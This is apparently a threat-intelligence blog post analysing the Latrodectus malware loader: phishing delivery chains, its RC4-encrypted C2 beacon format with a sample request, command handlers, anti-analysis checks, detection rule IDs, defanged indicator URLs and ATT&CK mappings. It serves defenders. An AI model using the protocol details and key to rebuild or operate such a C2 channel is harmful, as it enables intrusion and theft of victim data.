Latrodectus Loader

This research examines the distribution mechanisms, C2 traffic patterns, and functionality of Latrodectus loader.

Latrodectus Loader

Latrodectus is a loader first identified in October 2023 by researchers at Walmart. Walmart researchers identified a Latrodectus sample while investigating an IcedID campaign. Overlaps between IcedID and Latrodectus include: using the same network infrastructure, similar patterns in C2 traffic, and the DLL exports pointing to the same export function address. Recently, several different threat actors have been observed to use Latrodectus during intrusion campaigns where the primary delivery mechanism has been through email. Researchers at both Proofpoint and Palo Alto Networks’ Unit42 have reported that victims received emails containing links leading to the download and execution of Latrodectus samples. 

Figure 1. Pulsedive Latrodectus threat page

This blog provides an overview on distribution mechanisms, C2 traffic patterns, and the functionality of Latrodectus with the aim of highlighting core capabilities:

  • Obtaining new C2 domains
  • Running anti-analysis checks
  • Downloading and executing different file types
  • Collecting system information

How is it delivered?

Proofpoint’s Threat Research Team observed campaigns from two different threat actors using Latrodectus, TA577 and TA578. While the intrusion attempts by both actors start with email delivery, the intermediary steps taken to download Latrodectus samples differ slightly. 

Figure 2: Latrodectus infection chains for TA577 and TA578

TA577’s Delivery of Latrodectus

Proofpoint identified TA577, an initial access broker that previously used QBot extensively, as using Latrodectus in three separate intrusion campaigns in November 2023. TA577 uses emails to start intrusions by hijacking existing email threads and tricking victims to interact with attachments or embedded links. In one of the campaigns, the actor avoided thread hijacking and began to send emails containing links that downloaded a JavaScript file. The JavaScript file created and executed other scripts that in turn executed a Latrodectus DLL. In another campaign, the JavaScript file directly downloaded and executed Latrodectus instead of creating additional scripts. The group has also experimented with ISO files and LNK files as part of the infection chain. 

TA578’s Delivery of Latrodectus

TA578 is a threat actor that has previously used email to deliver malware such as Ursnif, BazaLoader and IcedID. In one of the TA578 campaigns, the threat actor impersonated companies to send threats about copyright infringement. The email contained language encouraging the recipient to access a contained link. The link redirected to a spoofed website for the company the threat actors were masquerading as. In the background, a JavaScript file was downloaded. When the JavaScript file was executed, it used msiexec.exe to execute a MSI that was retrieved from a remote WebDav share.

This sequence of events was also observed by Palo Alto Networks’ Unit 42 which reported that Latrodectus being used to drop Lumma Stealer onto victim devices.

Thread-hijacked email>link>redirects to fake Azure page>Firebase URL>.js file download> victim double-clicks JS file> wscript runs JS file> JS generates WebDAV traffic for MSI> MSI installs Latrodectus DLL>Latrodectus C2? Lumma EXE sent over Latrodectus C2
Figure 3: Infection chain observed by Unit 42. Source: Twitter

C2 Communication

Latrodectus sends back host information to C2 servers through POST requests where HTTP parameters are appended together. The information includes victim information that is used to uniquely identify the compromised host. The data sent back to the host is encrypted using RC4 and Base64-encoded before being sent to the C2 as part of the HTTP body. Researchers have observed that the RC4 key, 12345, has been reused across different samples. 

An example of the HTTP POST requests was shared by Elastic in a recent blog is shown below. 

Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
Host: aytobusesre.com
Content-Length: 256
Cache-Control: no-cache

M1pNDFh7flKrBaDJqAPvJ98BTFDZdSDWDD8o3bMJbpmu0qdYv0FCZ0u6GtKSN0g//WHAS2npR/HDoLtIKBgkLwyrIh/3EJ+UR/0EKhYUzgm9K4DotfExUiX9FBy/HeV7C4PgPDigm55zCU7O9kSADMtviAodjuRBVW3DJ2Pf5+pGH9SG1VI8bdmZg+6GQFpcFTGjdWVcrORkxBjCGq3Eiv2svt3+ZFIN126PcvN95YJ0ie1Puljfs3wqsW455V7
Figure 4: Initial Communication Observed by Elastic. The C2 responds with the command CLEARURL.

The decoded content of the HTTP POST request is:

counter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&mac=00:0c:24:0e:29:85;&computername=DESKTOP-3C4ILHO&domain=

The table below shows the information sent back to the C2 server. 

Field

Description

Counter

Count of HTTP requests that have been made

Type

Type of request (1 for registration, 3 for system info)

guid

Bot ID

os

Windows Operating System Version

arch

System Architecture (1 for 64 bit)

username

Username

group

Campaign identifier

up

Value from the sample

direction

C2 domain

mac

MAC address of infected device

computername

Hostname of infected device

domain

Domain of the infected machine belongs to

The value of up is unique for different samples and the exact purpose of this value is unclear at this point. 

As shown in Figure 5 below, the C2 responds with a list of commands below.

Cleartext Value

Description

CLEARURL

Removes all configured C2

URLS

Sets a new C2 

COMMAND

Command Handler 

ERROR

Reports and error to the bot

Proofpoint researchers shared an example of a response issued to an infected machine that included clearing existing C2s, setting new ones, and then collecting information from the device.

E3l9I35LXiOWKYHilDWuJoUOTU3NOyjNGnp3muFUOrabzvFw6FpoOQqdBZmsUV5E7FzXWHKgBafR6PcPckBsIB2vIhb3CZ/QHPoEO1hc0A++PpLQjpRWJkK3EFDxH/R5RYjhInO8hc0jTljC91GMVstjkxgQnuZLGBW6AV/gz4VrNMWUxFUtP4fdg/HKCREbRm+gIHkH/7Jc9Q==
Figure 5: Response issued by C2. Source: Proofpoint

Latrodectus Capabilities

When the C2 server responds with the instruction command, it includes a number which the malware uses to execute the correct command. Each action performed by the malware in response to the C2 response is done through common handlers. The command handlers check the value of response after command to identify the course of action that is taken.

The table below highlights the different commands the malware is capable of handling.

Handler Value

Description

2

Get list of files on desktop

3

Get list of processes running

4

Collects system information

12

Runs an .exe file

13

Execute DLL with Export

14

Executes command via CMD

15

Updates and restarts the bot

17

Terminates Latrodectus process

18

Downloads and executes bp.dat

19

Increases C2 beacon timeout

20

Reset the request counter variable

An example of the data collected from an infected hosts desktop is:

counter=0&type=1&guid=249507485CA29F24F77B0F43D7BA&os=6&arch=1&username=user&group=510584660&ver=1.1&up=4&direction=aytobusesre.com&desklinks=["OneDrive.lnk","OneNote.lnk","PowerPoint.lnk","Notepad++.lnk","Excel.lnk","Google Chrome.lnk","Snipping Tool.lnk","Notepad.lnk","Paint.lnk"]

To retrieve the list of running processes, the malware uses the Windows API - CreateToolhelp32Snapshot.

Elastic researchers discovered that the bp.dat file is used to execute the IcedID payload using rundll32.exe.

Dynamic API Resolving

Similar to other malware, Latrodectus samples resolve APIs at runtime. This means that a limited idea of its functionality can only be determined when looking at the imported APIs during static analysis. To resolve additional APIs at runtime, the malware queries the Process Environment Block (PEB) to resolve kernel32.dll and ntdll.dll. To get libraries from user32.dll and wininet.dll, the malware searches for all DLLs in the Windows system directory, gets the filename and then computes the CRC32 checksum value. The malware loads libraries using LoadLibraryW when the checksum value matches a desired hash. 

Figure 6: Resolution of DLLs using checksums. Source: Elastic

Anti-Analysis Techniques

The sample leverages several anti-analysis techniques to make analysis of the malware more difficult. These techniques include:

  • Checking the BeingDebuggedFlag in the PEB
  • Checking the number of running processes
    • If there are fewer than 75 running processes then the operating system needs to be Windows 10, 11 or Windows Server 2016
  • Checking the operating system version
    • If there are less than 50 running processes then the operating system can be Windows Server 2003 R2, Windows XP, Windows 2000, Windows 7, Windows 8, or Windows Server 2012/R2
  • Checking if the process is running as a 32-bit application on a 64-bit Operating system
  • Checking the MAC address of the device
    • The sample terminates if a valid MAC address is not found
Figure 7: Anti-analysis techniques used by Latrodectus.

Conclusion

Latrodectus is a newer loader that has been observed within the threat landscape and leveraged by multiple threat actors. The malware has notable overlaps with IcedID and adopts several anti-analysis techniques which make it difficult to detect and analyse. Latrodectus C2s can send commands over HTTP requests that instruct the malware to perform additional actions such as executing files, collecting system information, and terminating its own processes. 

Recommendations

  • Continued User Awareness Training
    • Latrodectus requires user execution. Continued user awareness training mitigates the risk posed by spam and malvertising by teaching users how these threats work and what to look out for. 
  • Ensure that security solutions have detections in place for activity that associated with Latrodectus
    • Ensure that host based logging solutions such as SIEM and EDR are able to alert on Rundll32 being used to download executables and when Rundll32 is used to initiate connections to public IP addresses. 
    • Proofpoint shared the following Suricata rules to detect Latrodectus network activity. 
      • 2048735 ET MALWARE Latrodectus Loader Related Activity (POST) 
      • 2049231 ET MALWARE Latrodectus Alive Request (GET) 
      • 2049232 ET MALWARE Latrodectus Alive Response M1 
      • 2049233 ET MALWARE Latrodectus 404 Response 
      • 2049700 ET MALWARE Latrodectus Alive Response M2 
      • 2049701 ET MALWARE Latrodectus Alive Response M3 
      • 2049702 ET MALWARE Latrodectus Alive Response M4 
      • 2049703 ET MALWARE Latrodectus Alive Response M5 
      • 2049704 ET MALWARE Latrodectus Alive Response M6 
      • 2049705 ET MALWARE Latrodectus Alive Response M7 
      • 2049706 ET MALWARE Latrodectus Alive Response M8 
      • 2051602 ET MALWARE Latrodectus Related Activity (POST) 

Indicators of Compromise

The table below contains a subset of 250+ Latrodectus network IoCs that have been identified, aggregated, and added to the Pulsedive platform. This data can be queried in Pulsedive using the Explore query threat=Latrodectus and is available for export in multiple formats (CSV, STIX 2.1, JSON).

Latrodectus IOCs

hxxps[://]zatracon[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]meilinhotels[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]darkknight-media[.]com/tasawer/wp-content/plugins/share-private-fls/shared

hxxps[://]zeemark[.]in/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]qi-code[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]zk1construction[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]tajimateknikservis[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]www[.]tatuhirdavat[.]com/wp-content/plugins/share-private-fls/shared

hxxps[://]illoskanawer[.]com/live/

hxxps[://]workspacin[.]cloud/live/

And more, retrieve all indicators here 

MITRE ATT&CK TTPs

Technique

Tactic

Command and Control

Ingress Tool Transfer (T1105)



Defense Evasion

Obfuscated Files or Information (T1027)

Process Injection (T1055)

Impair Defenses: File Deletion (T1070.004)

System Binary Proxy Execution: Msiexec (T1218.007)

System Binary Proxy Execution: Rundll32 (T1218.011)

Virtualization/Sandbox Evasion (T1497)

Hijack Execution Flow: DLL Side-Loading (T1574.001)

Discovery

Process Discovery (T1057)

System Information Discovery (T1082)

File and Directory Discovery (T1083)

Virtualization/Sandbox Evasion (T1497)

Execution

Windows Management Instrumentation (T1047)

Scheduled Task/Job: Scheduled Task (T1053.005)

Command and Scripting Interpreter: Windows Command Shell (T1059.003)

Command and Scripting Interpreter: JavaScript (T1059.007)

User Execution: Malicious File (T1204.002)

System Binary Proxy Execution: Rundll32 (T1218.011)

Exfiltration

Exfiltration Over C2 Channel (T1041)

Initial Access

Phishing (T1566)

Persistence

Scheduled Task/Job: Scheduled Task (T1053.005)

Create or Modify System Process (T1543)

Hijack Execution Flow: DLL Side-Loading (T1574.001)

Privilege Escalation

Scheduled Task/Job: Scheduled Task (T1053.005)

Process Injection (T1055)

Create or Modify System Process (T1543)

Hijack Execution Flow: DLL Side-Loading (T1574.001)

References